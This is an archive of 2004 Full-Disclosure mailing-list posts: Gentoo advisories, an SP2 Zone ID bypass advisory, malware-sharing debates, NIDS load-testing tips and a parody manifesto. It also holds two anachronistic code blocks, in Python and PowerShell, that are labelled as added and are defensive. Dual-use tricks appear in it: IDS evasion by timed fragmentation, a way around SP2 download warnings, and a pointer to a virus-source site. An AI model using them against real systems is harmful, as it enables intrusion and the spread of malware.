Re: [Full-Disclosure] Re: Microsoft Update Loader msrtwd.exe

2004-09-03 Thread S.A. Birl
On Sep 3, Über GuidoZ ([EMAIL PROTECTED]) typed:

UGZ:  Easy sparky. Maybe it isn't his choice that he cannot release the EXE.
UGZ:  It's entirely possible, in fact, quite likely, that some "higher up"
UGZ:  who knows dick about IT and viruses got scared and said "This cannot
UGZ:  be shared with anyone! If it does, you'll lose your job". Just because
UGZ:  they are worried about their image or that the file might contain
UGZ:  sensitive data.
UGZ:
UGZ:  I have run into this situation MANY times. There is usually little you
UGZ:  can do about it as an IT staff member or a consultant. So the next
UGZ:  best thing - ask a group of people that might have a clue what's going
UGZ:  on, WITHOUT needing to see or analyze said file.
UGZ:
UGZ:  Sheesh, give the guy a break. The only pollution I've noticed lately
UGZ:  is rude comments.


Aye, Über is correct.

When I first posted, I didn't have the EXE.  When I did receive a copy of
the file, I was told I cannot send it outside of the network.

Besides, I've been on this list long enough to know that questions like
mine are asked from time to time.




On Thu, 2 Sep 2004 20:30:53 +0200 (CEST), A bitter Feher Tamas <[EMAIL PROTECTED]>
wrote:

> When the f*ck will people finally realize that it is NOT possible to say
> anything about a file without actually having the file?
>
> If you wanna know what the f*ck this or that file is, go to and feed that
> file here:
> http://www.kaspersky.com/scanforvirus
>
> Less than 50 chars to remember and you can stop polluting this list.
> Wow!
>
> Regards: Tamas Feher.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Empirical data surrounding guards and firewalls.

2004-09-03 Thread James Tucker
On Fri, 3 Sep 2004 15:22:15 +0200, [EMAIL PROTECTED]
<[EMAIL PROTECTED]> wrote:
> 
> You wrote:
> 
> > ..
> > Of course I could be missing something?
> > ..
> 
> 400 != 404 ?
> 
> 
> /* Return code=1: generic error condition
> Return code=2: all other error conditions */
> 

Put in my place, I feel very shamed, I misread the original. This does
however re-maintain the fact that his analogy was in fact really quite
a good one.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [OT] Re: [Full-Disclosure] Re: New paper on Security and Obscurity

2004-09-03 Thread Barry Fitzgerald
Stormwalker wrote:
> Hi,
> It wasn't the general, massive military build up, but the specific
> program known as Star Wars under Ronald Raygun. The Soviets believed
> that the nonsense was true and tried to fund the research to catch up
> until they hit the wall. Unlike real military weapons, a fake weapon
> is controlled by the imagination, so there were no limits to what was
> possible.
>
> cheers, bob

Well, in all fairness, that wasn't the intent of the missile defense 
network.  Many people considered it a very real "weapon" and we spent 
quite a bit of money on it as well.

But, the rumors of a nasty super-weapon didn't hurt in sending the 
Soviet system down. 

Like I said, it's never just one thing.  But ultimately, it's poor 
governing on the part of the Soviets that brought the Soviet Union down. 

-Barry
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] [ GLSA 200409-07 ] xv: Buffer overflows in image handling

2004-09-03 Thread Sune Kloppenborg Jeppesen
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200409-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: xv: Buffer overflows in image handling
  Date: September 03, 2004
  Bugs: #61619
ID: 200409-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

xv contains multiple exploitable buffer overflows in the image handling
code.

Background
==========

xv is a multi-format image manipulation utility.

Affected packages
=================

    -------------------------------------------------------------------
     Package                   /  Vulnerable  /                 Unaffected
    -------------------------------------------------------------------
      1  media-gfx/xv                 < 3.10a-r7                >= 3.10a-r7

Description
===========

Multiple buffer overflow and integer handling vulnerabilities have been
discovered in xv's image processing code. These vulnerabilities have
been found in the xvbmp.c, xviris.c, xvpcx.c and xvpm.c source files.

Impact
======

An attacker might be able to embed malicious code into an image, which
would lead to the execution of arbitrary code under the privileges of
the user viewing the image.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All xv users should upgrade to the latest stable version:

# emerge sync

# emerge -pv ">=media-gfx/xv-3.10a-r7"
# emerge ">=media-gfx/xv-3.10a-r7"

References
==========

  [ 1 ] BugTraq Advisory
http://www.securityfocus.com/archive/1/372345/2004-08-15/2004-08-21/0
  [ 2 ] CAN-2004-0802
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0802

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200409-07.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBOGf+zKC5hMHO6rkRAs+8AJ9iqIQJ1+lbPhDobuLGueJrF0OGYwCfTiN+
diMCKpuf1Ld5GyfdwUkHUJE=
=WGtM
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] win2kup2date.exe ?

2004-09-03 Thread James Tucker
On Fri, 3 Sep 2004 04:05:02 -0700 (PDT), Harlan Carvey
<[EMAIL PROTECTED]> wrote:
> James,
> 
> I'm replying off-list for the simple fact that I can't
> believe the post you sent to FD.  Your questions back
> to Nick are...well, what's the right word???...it's as
> if you're not even paying attention.

Apologies I will try to explain myself. I am sending this back to the
list, as it is obvious that my meaning was not clear, and there may be
some points to be learned by others also. Thank you for pointing this
out to me.

 > > > > ...  If you want to email me a copy of it, I'll
> > > > rip it apart and see what can be seen.
> > >
> > > And world plus dog should entrust you with such
> > material because???
> > ... most viruses, trojans and malware to not store
> > copies of stolen
> > data in their executables. Furthermore the file size
> > is very small.
> 
> Interesting answer, but completely non sequitur.  Nick
> asked why this person should be trusted with a live
> bit of malware, and your response is that it's not
> very big???  What does that have to do with anything?

Malware and viruses are VERY readily available in many places across
the internet. Therefore this point should be of no concern. The only
other concern which may be important is the possibility that the
binary is carrying data from the infected system; it was this that I
was referring to. Please accept my apology for not making this clearer.

 
 > > > P.S. Send it to [...] - it's my "catch all" for
> > > > virus/unknown files. Just be sure to ZIP it up
> > or else the web host
> > > > won't let it through. Otherwise I have disabled
> > all checks/scan.
> > > > Downloads directly to a secured Linux box.
> > >
> > > That's all very nice, but alone, far from the
> > makings of someone to
> > > entrust arbitrary, suspected malware samples to.
> >
> > "Entrust", just what exactly are you thinking you
> > might be giving away?
> 
> Well, it's pretty obvious...a live bit of malware.
> It's really pretty obvious what Nick's getting
> at...why send this malware to some arbitrary person?
> Who's to say that he's going to use it as he says, and
> not send it back out to someone else?

To what end? It would be much more useful to an attacker to go and
collect and customise one of the many readily available trojans on the
internet, rather than spreading malware which they have no control
over. IMHO your concern is closer to cynicism than practical reality.


> > Again, you suspect a lot of deception here, and
> > while it is of course
> > possible you are correct, I have yet to see this
> > ever done in practice.
> 
> You haven't seen deception in practice...in general,
> or specifically in the case of VirusTotal?

If the virus was carrying data from the local system, and some hackers
had set up a fake site of the VirusTotal sort, this would be a
sophisticated way of deceiving "security pros" into passing out
details. It would be easily possible to carry all of their password
hashes, for example, if any of them run VPNs this would be a near
instant release of access passwords (an army of several hundred
zombies could decode all the LM hashes in minutes).

 
> > Samples of non-data carrying viruses or
> > trojans are of
> > little use to anyone other than Anti-Virus firms, as
> > it is easy to
> > collect raw source for most if one is so inclined.
> 
> Really?  Are you able to do so?  I would submit that
> many with malicious intent don't know the sites and
> sources you seem to be aware of, and will actually ask
> for the binary...for the purpose of releasing it
> against someone else.  Non-data carrying or otherwise,
> it doesn't matter.  I received several IMs just this
> weekend in which I was asked for running viruses.

Well, the same lack of trust may be given to you. In order to find a
balance between proving my point and not providing you with up to date
info, I will provide you with this (http://vx.netlux.org/) site as an
example, which is not carrying any modern sources at this time. You
can find these easily by trawling security sites of high standards,
they have outbound links to such sites. Google is rarely your friend
in this regard, which may be why you are not aware of the high
numeracy of such sites on the internet. Needless to say that this lack
of awareness is possibly a good thing for most people (read: reduces
script-kiddie access to such data).

 
> > I agree that it is unlikely they have sufficient
> > client licenses to
> > provide such a service; however I can see that there
> > are a great deal
> > of arguments in law about how their case may be won.
> 
> If a product is used in a manner for which it is not
> sufficiently or correctly licensed, how can one then
> use the law to win their case?  After all, it wouldn't
> be "their" (ie, VirusTotal's) case...it would be a
> case brought against them by the vendor.

I am not a lawyer, but I have seen cases won due to lack of definition
of a license. In this case the argument I gave

Re: [Full-Disclosure] Re: Empirical data surrounding guards and firewalls.

2004-09-03 Thread James Tucker
Yes, I realised that last night. 

It is interesting, but I think in his attempt to disprove the
analogy, he came up with a very comparable one.

The firewall at McDonalds.com seems to filter all data to all ports
other than port 80. You can't enter a McDonalds restaurant through
anything but the door.

The firewall is not content filtering, thus does not stop bad requests
passing through it.
The door does not stop people for incorrect attire.

The webserver returned a 404 error when a request was made for
something which did not exist there.
It is now at this point we start to see this anology fall down, but
that is because the two situations are in fact different. Technically,
you could argue that the poor attire was in breach of protocol. This
would prompt a different response than the equivalent supplied here in
the example of the virtual world.

More accurately, the packet (Evol) should not have been in breach
of protocol, as his virtual packet never was. In fact he should have
requested something that was not on the menu. The response would have
been very much like Error 404 Item On Menu Not Found.

Of course analogies fall down when they are not actually built to be
the same thing. Without adding more kindling to the fire, this is
possibly one of the better analogies I have seen for a simple allowed
connection to a webserver.

Now the problem with expanding an analogy is that it is hard to find
appropriate comparative things.

Let's use an example of one of the old IIS exploits. The erroneous data
for many of the old IIS exploits is actually a breach of the HTTP
protocol. Some firewalls can use content filtering against this; this
would be comparable to a "detector" on the door looking for a person
(packet) carrying an illegal object (an illegally formed request). If
the firewall is not content filtering the data reaches the webserver,
and the webserver DoSes when the data is read. Well, this is hard to
equate; it's like the person walking up to the attendant and shouting
at them in a foreign language, with sufficient intensity to knock
them unconscious. Unconscious is difficult still, as neural nets
(brains) are very good at recovering from this kind of problem,
whereas computers end up in infinite loops with equal ease.


It is likely that abstraction is a better way of teaching this kind of
thing. You need to teach at one level in the stack at a time. The
other levels could be thought of as having interfaces, and you can
maybe describe some functionality of the interface in a less than
fully accurate way. But... It's a bit like trying to teach RF to an IP
guy though, much of the time they just don't get it.

Anyway, I think Frank has some very well written arguments on this
problem, I don't feel we are going to be able to develop much more
useful from the discussion until a good idea for a solution to the
lack of time vs. not using analogies problem is found. Who ever said
teaching was easy?

EOF, EOT, EOD.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Re: Security & Obscurity: physical-world analogies

2004-09-03 Thread Tig
On Fri, 3 Sep 2004 02:04:08 -0600, [EMAIL PROTECTED]
<[EMAIL PROTECTED]> wrote:
[...]
> 
> No, CEOs et al do not have an hour to spend reading full-disclosure
> everyday.  But in today's world it is imperative that they have someone
> on staff who does.  And they listen to that person.  Equipped with good
> thought tools to consider what this person says will enable them to make
> the right decisions regarding the security and integrity of their
> organization.
> 

This sums up exactly what is required. While this thread has been
informative, the above paragraph is all that is required by the CEOs
to be read. Peter Swire should copy it and publish it as 4 years of
work - nothing more needs to be said and I bet most CEOs will even
read it as it's only a paragraph long :]

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] The Hacker's Manifesto Reloaded

2004-09-03 Thread the entrepreneur
The following was written shortly after my
placement...

   \/\The Conscience of a Hacker - Redux /\/
   (c)CopyRight SuppaDuppaSecurity Solutions.
   *where do u wanna pee today*
   by

   +++The Entrepreneur+++

   Written on September 3, 2004.


Another one got bought today, it's all over the Wall
Street.  "Teenager Floated A Big Security Company", 
"Hacker Paid After Ethical Hacking Of A Bank..."
Damn kids.  They're all money whores.

But did you, in your C Grade Economics Degree and
l4am3 technobrain, ever take a look behind the eyes of

this professional hacker?  Did you ever wonder what
made him whored, what forces lured him, what may have
sold him?
I am a professional hacker, look at my bank
account...

Mine is a world that begins with money... I'm richer
than most of the other kids, this crap they buy is so
darn cheap...
Damn underachiever.  They're all money whores.

I'm a junior security consultant.  I've listened to
senior security professionals about how to be a good
hacker.  
I spit at it.  "No, Mr.NiceGuy-CISSP CISA CEH, I
didn't show my 0day. I sold it..."
Damn kid.  Probably leeched it.  They're all
money whores.

I made a discovery today.  I found a Venture
Capitalist.  Wait a second, this is cool.  It does
what I want it to. 
If it makes a mistake, he doesn't notice because he is
lame. He doesn't understand a crap of security, but he
is blinded 
by that greenish tinge of money. He says it's the real
thing, biotech was a fluke. I do BlaBlaBla and he is
cashing in on it. 
Damn kid.  All he does is techno babble. 
They're all money whores.

And then it happened... a door opened to a world...
rushing through the phone line like money through ATM
wires, 
an electronic account transfer is done, a refuge from
the day-to-day incompetencies is sought... I sold the
code.

"This is it... this is where I belong..."
I can buy everyone here... even if I've never met
them, never talked to them, may never hear from them
again... 
I can buy you all...
Damn professional hacker.  Tying up the server
again with his DDoS bots.  They're all money whores...

You bet your ESOPs we're all alike... we've been
spoon-fed security certifications when we hungered for
real stuff
... the bits of meat that you gave was old seminar
crap, for which you charged $500.  
We've been dominated by, or taken over by these so
called security gurus.  The few that had something to
teach found us 
willing pupils, but those poor few are like money in
their accounts.

This is our world now... the world of the security and
hoopla, the beauty of the moolah.  We make use of a
service 
already existing without licensing for what could be
dirt-cheap if it wasn't run by profiteering gluttons,
and
you call us money whores.  We sell what you already
sold.. and you call us money whores.  
Yes, I am a professional hacker.  My crime is that of
greed.  My crime is that of cashing in on this
security hype.
My crime is that of outsourcing you, something that
you will never re-pay me for.

I am a professional hacker, and this is my
manifesto*[(c) Please read EULA for further details]. 
You may stop this individual, 
but you can't stop us all
... after all, we're all money whores.


   +++The Entrepreneur+++





___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] [RE: Test scripts for NIDS]

2004-09-03 Thread Thomas Pollet
> > I've gotten a lot of suggestions to test the
> > signatures, i've got some to test the load but they
> > were $$$, anything out there for free ?
> >
> > With a software and not an appliance how does one test
> > the load to know when the IDS can no longer verify
> > packets and they are being dropped ? Is this included
> > in the software ?
> >

You can send random data with tools like iperf or tftp and in the meantime
send some data through netcat. Depending on the preprocessor config (with
snort), you will notice the NIDS will start to drop packets. The same is
possible with fragmented packets (hping2): send the first fragment, wait some
time (e.g. 45 seconds) and send the second fragment.

greets,
Thomas

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
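The two failure modes Thomas describes (a sensor that drops state under load, and a reassembly timeout shorter than the gap between two fragments) are easiest to reason about with a model of what the preprocessor keeps in memory. The following is an added example written for this page, not code from the post or from any NIDS product: a deliberately simplified fragment reassembler with a configurable timeout and a bounded table of partial datagrams, fed constructed fragments on a constructed clock. The 30-second timeout, the 100-entry budget, the `PATTERN` marker and the `run_scenario` helper are all assumptions chosen to illustrate the point; real sensors also apply per-OS overlap policies that this model leaves out.

```python
"""Toy NIDS-style IP fragment reassembler with a timeout and a memory budget.

Added example (not from the post): fragments, timeout and budget below are
constructed values, and the reassembler is a simplified model of what a
NIDS preprocessor keeps in memory, not any real product's code.
"""
from dataclasses import dataclass, field

# Constructed marker standing in for a content signature the sensor matches on.
PATTERN = b"TEST-SIGNATURE"


@dataclass
class Fragment:
    ts: float        # arrival time in seconds (constructed clock)
    frag_id: int     # IP identification field shared by all fragments of one datagram
    offset: int      # byte offset of this payload inside the full datagram
    more: bool       # "more fragments" flag; False marks the last fragment
    payload: bytes


@dataclass
class Reassembler:
    timeout: float = 30.0      # seconds a partial datagram is kept before being expired
    max_pending: int = 100     # how many partial datagrams the sensor will hold at once
    pending: dict = field(default_factory=dict)
    stats: dict = field(default_factory=lambda: {
        "reassembled": 0, "expired": 0, "dropped_budget": 0})

    def _expire(self, now):
        """Discard partial datagrams whose first fragment is older than the timeout."""
        stale = [k for k, e in self.pending.items() if now - e["seen"] > self.timeout]
        for k in stale:
            del self.pending[k]
            self.stats["expired"] += 1

    def feed(self, frag):
        """Accept one fragment; return the full datagram bytes once it is complete."""
        self._expire(frag.ts)
        entry = self.pending.get(frag.frag_id)
        if entry is None:
            if len(self.pending) >= self.max_pending:
                # Budget exhausted: a real sensor would drop or evict here; we drop.
                self.stats["dropped_budget"] += 1
                return None
            entry = {"seen": frag.ts, "parts": {}, "total": None}
            self.pending[frag.frag_id] = entry
        entry["parts"][frag.offset] = frag.payload
        if not frag.more:
            entry["total"] = frag.offset + len(frag.payload)
        data = self._assemble(entry)
        if data is not None:
            del self.pending[frag.frag_id]
            self.stats["reassembled"] += 1
        return data

    @staticmethod
    def _assemble(entry):
        """Return the datagram if every byte up to the known total is covered, else None."""
        if entry["total"] is None:
            return None
        out = b""
        for off in sorted(entry["parts"]):
            if off != len(out):
                return None   # gap (or overlap; real sensors apply per-OS overlap policies)
            out += entry["parts"][off]
        return out if len(out) == entry["total"] else None


def run_scenario(gap_seconds, timeout=30.0, flood=0):
    """Send one two-fragment datagram carrying PATTERN through a sensor.

    gap_seconds: delay between the first and second fragment (the post's 45 s case).
    flood: number of unrelated first-fragment-only datagrams sent beforehand (load case).
    Returns whether the sensor ever saw PATTERN, plus its counters.
    """
    sensor = Reassembler(timeout=timeout, max_pending=100)
    now = 0.0
    for i in range(flood):   # constructed load: datagrams that never complete
        sensor.feed(Fragment(now, 1000 + i, 0, True, b"x" * 8))
    payload = b"hello " + PATTERN + b" world"
    first, second = payload[:8], payload[8:]
    sensor.feed(Fragment(now, 1, 0, True, first))
    data = sensor.feed(Fragment(now + gap_seconds, 1, 8, False, second))
    return {"seen_pattern": data is not None and PATTERN in data, **sensor.stats}


if __name__ == "__main__":
    print("in time   :", run_scenario(1))            # reassembled, pattern seen
    print("45 s gap  :", run_scenario(45))           # first fragment expired, pattern never seen
    print("under load:", run_scenario(1, flood=100))  # budget exhausted, both fragments dropped
```

The counters are the part worth keeping when you run a test like the one Thomas outlines against a real sensor: a rising expired or dropped count during the test, with no corresponding alert, is the evidence that the reassembly window or the state budget is smaller than the traffic the sensor is expected to see.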


Re: [Full-Disclosure] [VirusTotal] Scan result (fwd)

2004-09-03 Thread Michel Messerschmidt
On Thu, Sep 02, 2004 at 04:01:16PM -0400, Über GuidoZ wrote:
> It's kind of interesting to see the results, as it shows you what AV
> programs seem to detect things better then others. 

I think this is actually misleading. 
You know nearly nothing from scanning just a single (or 10, 50,...) 
sample. And there are other basic test requirements. For example:
- the different results could be due to differences in the update 
  schedule at virustotal.com (some vendors offer their fastest updates
  only for premium licenses, which virustotal may not have). 
- maybe some products are used with optimized settings (for example 
  maximum heuristic detection) and others with default settings.


> It's also useful 
> for known viruses, but needing to know what each AV program calls
> them. (I find this useful when trying to do tech support.)

You know Vgrep (http://www.virusbtn.com/resources/vgrep/index.xml) ?


-- 
Michel Messerschmidt   [EMAIL PROTECTED]
antiVirusTestCenter, Computer Science, University of Hamburg



[Full-Disclosure] Flaws in the new security functions of SP2 - revisited

2004-09-03 Thread Juergen Schmidt

A couple of days ago I posted an advisory about flaws in the new
security functions of Service Pack 2 (for details, see:
http://www.heise.de/security/artikel/50051). Now I would
like to share some additional information which has been
found out in conjunction with Sven Ritter, a German
developer.

1) The Windows Explorer caching issue

We gave a second look at the issue reported previously that
Windows Explorer under certain conditions launches files
using outdated Zone ID information from a system cache.
Further inspection reveals that this does not only affect
Explorer but any software which launches applications or
scripts using the ShellExecuteEx function supplied by
Windows.

The Internet Security Manager is in charge of determining
the zone of a file (CLSID_InternetSecurityManager). This
object contains a cache (CSecurityManager::CSecMgrCache)
which stores zones which have been determined previously.
When the function is called again, the method
CSecurityManager::MapUrlToZoneInternal will first check
whether there is a cached request for the corresponding file
or URL. If there is cached information, the method will
return the previously determined zone -- even if the file's
Zone ID has changed in the meantime. Since the Internet
Security Manager is loaded as a COM object into the current
process, the cache is local to that process. This explains
why the problem can be "alleviated" by restarting Windows
Explorer.

It appears that the cache size is limited to four entries.
If four files with different names are launched after the
start of application XY, the function will recognize the
changed Zone ID of application XY.

2) Other Execution Paths

The previous advisory showed how cmd.exe completely ignores
Zone IDs. Further tests revealed other execution paths which
circumvent checks contained in SP2.

Refresher: When downloading files through Internet Explorer
and Windows Messenger or saving attachments transferred by
Outlook Express, the file is given a Zone ID saved in an
Alternate Data Stream. When a downloaded application or
script is launched, Windows displays a security warning
which alerts the user to the fact that this file has been
downloaded from the Internet and that it could be dangerous.

If you extract files from a ZIP archive which has been
downloaded from the Internet using XP's built-in ZIP Wizard
(using File/Extract all), SP2 sets the Zone ID for the
extracted files. However, if the ZIP archive is opened with
a double-click and an executable file is extracted by Drag &
Drop to the desktop or using Copy & Paste, no Zone ID is
set.

Additionally, Zone IDs are not set on files marked as
Read-only -- even when using the Wizard. If the
downloaded archive evil.zip contains evil1.exe (attrib
-R) and evil2.exe (attrib +R) and you extract them with
the Wizard into the folder evil, opening evil1 gives
you a warning, while opening evil2 does not.
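As an added example (not code from the advisory or from Microsoft), the PowerShell functions below audit an extraction folder for files that carry no Zone.Identifier stream, flag the read-only case the advisory describes, and re-apply the Internet zone mark. They assume Windows PowerShell 3.0 or later on an NTFS volume; the demo folder and file names are constructed.

```powershell
# Added example, not code from the advisory or from Microsoft. Audits the
# files in a folder (for example the target of a ZIP extraction) and reports
# which ones carry no Zone.Identifier alternate data stream, i.e. which ones
# would launch without the SP2 download warning. Requires Windows PowerShell
# 3.0 or later and an NTFS volume; folder and file names in the demo are
# constructed.

function Get-ZoneIdentifierAudit {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory = $true)]
        [string] $Folder,

        # Extensions that Windows would warn about if the Zone ID were set.
        [string[]] $RiskyExtensions = @('.exe', '.scr', '.com', '.bat', '.cmd', '.vbs', '.js', '.pif')
    )

    Get-ChildItem -LiteralPath $Folder -File -Recurse | ForEach-Object {
        $file   = $_
        $zoneId = $null

        # When present, the stream holds an INI-style block such as
        #   [ZoneTransfer]
        #   ZoneId=3        (3 = Internet zone)
        $stream = Get-Item -LiteralPath $file.FullName -Stream 'Zone.Identifier' -ErrorAction SilentlyContinue
        if ($stream) {
            $content = Get-Content -LiteralPath $file.FullName -Stream 'Zone.Identifier' -ErrorAction SilentlyContinue
            $line = $content | Where-Object { $_ -like 'ZoneId=*' } | Select-Object -First 1
            if ($line -and ($line -match '^ZoneId=(\d+)')) { $zoneId = [int] $Matches[1] }
        }

        $risky = $RiskyExtensions -contains $file.Extension.ToLower()
        if ($risky -and $null -eq $zoneId) { $finding = 'UNMARKED EXECUTABLE' }
        elseif ($null -eq $zoneId)         { $finding = 'no zone id' }
        else                               { $finding = '' }

        [pscustomobject] @{
            File     = $file.FullName
            ReadOnly = $file.IsReadOnly   # the advisory's read-only case
            ZoneId   = $zoneId
            Finding  = $finding
        }
    }
}

# Re-applies the Internet zone mark to a file that lost it. Writing the stream
# of a read-only file fails with access denied, so the attribute is cleared for
# the write and restored afterwards.
function Set-InternetZoneMark {
    param([Parameter(Mandatory = $true)] [string] $Path)

    $item = Get-Item -LiteralPath $Path
    $wasReadOnly = $item.IsReadOnly
    if ($wasReadOnly) { $item.IsReadOnly = $false }
    try {
        Set-Content -LiteralPath $Path -Stream 'Zone.Identifier' -Value "[ZoneTransfer]`r`nZoneId=3"
    }
    finally {
        if ($wasReadOnly) { $item.IsReadOnly = $true }
    }
}

# Demo in a constructed folder, mirroring the advisory's evil1.exe (attrib -R,
# marked) and evil2.exe (attrib +R, unmarked) scenario. Neither file is a real
# program; both are plain text placeholders.
$demo = Join-Path $env:TEMP 'zone-audit-demo'
New-Item -ItemType Directory -Path $demo -Force | Out-Null
$evil1 = Join-Path $demo 'evil1.exe'
$evil2 = Join-Path $demo 'evil2.exe'
Set-Content -LiteralPath $evil1 -Value 'placeholder, not a program'
Set-Content -LiteralPath $evil1 -Stream 'Zone.Identifier' -Value "[ZoneTransfer]`r`nZoneId=3"
Set-Content -LiteralPath $evil2 -Value 'placeholder, not a program'
Set-ItemProperty -LiteralPath $evil2 -Name IsReadOnly -Value $true

# Audit once as extracted, then again after re-marking the read-only file.
Get-ZoneIdentifierAudit -Folder $demo | Format-Table -AutoSize
Set-InternetZoneMark -Path $evil2
Get-ZoneIdentifierAudit -Folder $demo | Format-Table -AutoSize
```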

bye, ju

-- 
Juergen Schmidt   Chefredakteur   heise Security   www.heisec.de
Heise Zeitschriften Verlag,  Helstorferstr. 7,  D-30625 Hannover
Tel. +49 511 5352 300   FAX +49 511 5352 417   EMail [EMAIL PROTECTED]



Re: [Full-Disclosure] [VirusTotal] Scan result (fwd)

2004-09-03 Thread Michel Messerschmidt
On Fri, Sep 03, 2004 at 10:43:50AM +0530, Aditya Deshmukh wrote:
> hey if the binary is infected and does not contain any hardcoded 
> sencitive info what do u care about the owners of the website ? 

Unless for (a purely theoretical) example the website would use your 
submission to infect others (perhaps with your address as sender) :-) 
Although the binary may not contain any sensitive data, it is dangerous 
in itself because it is self-replicating and thus hard to control once 
it is activated. If you are not very cautious when handling 
self-replicating code, you most likely end up sending it out to the 
world.

So for the question how to handle possibly dangerous code 
it all comes down to "Who do you trust" ?

-- 
Michel Messerschmidt   [EMAIL PROTECTED]
antiVirusTestCenter, Computer Science, University of Hamburg



[Full-Disclosure] UPDATE: [ GLSA 200408-22 ] Mozilla, Firefox, Thunderbird, Galeon, Epiphany: New releases fix vulnerabilities

2004-09-03 Thread Sune Kloppenborg Jeppesen

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200408-22
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Mozilla, Firefox, Thunderbird, Galeon, Epiphany: New
            releases fix vulnerabilities
      Date: August 23, 2004
      Bugs: #57380, #59419
        ID: 200408-22

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

New releases of Mozilla, Epiphany, Galeon, Mozilla Thunderbird, and
Mozilla Firefox fix several vulnerabilities, including remote DoS and
buffer overflows.

Background
==========

Mozilla is a popular web browser that includes a mail and newsreader.
Galeon and Epiphany are both web browsers that use gecko, the Mozilla
rendering engine. Mozilla Firefox is the next-generation browser from
the Mozilla project that incorporates advanced features that are yet to
be incorporated into Mozilla. Mozilla Thunderbird is the
next-generation mail client from the Mozilla project.

Affected packages
=================

-------------------------------------------------------------------
     Package                 /   Vulnerable   /     Unaffected
-------------------------------------------------------------------
  1  mozilla                     < 1.7.2          >= 1.7.2
  2  mozilla-firefox             < 0.9.3          >= 0.9.3
  3  mozilla-thunderbird         < 0.7.3          >= 0.7.3
  4  mozilla-bin                 < 1.7.2          >= 1.7.2
  5  mozilla-firefox-bin         < 0.9.3          >= 0.9.3
  6  mozilla-thunderbird-bin     < 0.7.3          >= 0.7.3
  7  epiphany                    < 1.2.7-r1       >= 1.2.7-r1
  8  galeon                      < 1.3.17         >= 1.3.17
-------------------------------------------------------------------
     8 affected packages on all of their supported architectures.
-------------------------------------------------------------------

Description
===========

Mozilla, Galeon, Epiphany, Mozilla Firefox and Mozilla Thunderbird
contain the following vulnerabilities:

* All Mozilla tools use libpng for graphics. This library contains a
  buffer overflow which may lead to arbitrary code execution.

* If a user imports a forged Certificate Authority (CA) certificate,
  it may overwrite and corrupt the valid CA already installed on the
  machine.

Mozilla, Mozilla Firefox, and other gecko-based browsers also contain a
bug in their caching which may allow the SSL icon to remain visible,
even when  the site in question is an insecure site.

Impact
======

Users of Mozilla, Mozilla Firefox, and other gecko-based browsers are
susceptible to SSL certificate spoofing, a Denial of Service against
legitimate SSL sites, crashes, and arbitrary code execution. Users of
Mozilla Thunderbird are susceptible to crashes and arbitrary code
execution via malicious e-mails.

Workaround
==========

There is no known workaround for most of these vulnerabilities. All
users are advised to upgrade to the latest available version.

Resolution
==========

All users should upgrade to the latest stable version:

# emerge sync

# emerge -pv your-version
# emerge your-version

References
==========

  [ 1 ] CAN-2004-0763
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0763
  [ 2 ] CAN-2004-0758
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0758
  [ 3 ] CAN-2004-0597
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597
  [ 4 ] CAN-2004-0598
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0598
  [ 5 ] CAN-2004-0599
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0599

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200408-22.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

[Full-Disclosure] Re: Empirical data surrounding guards and firewalls.

2004-09-03 Thread gadgeteer
On Thu, Sep 02, 2004 at 11:15:04PM +0100, James Tucker ([EMAIL PROTECTED]) wrote:
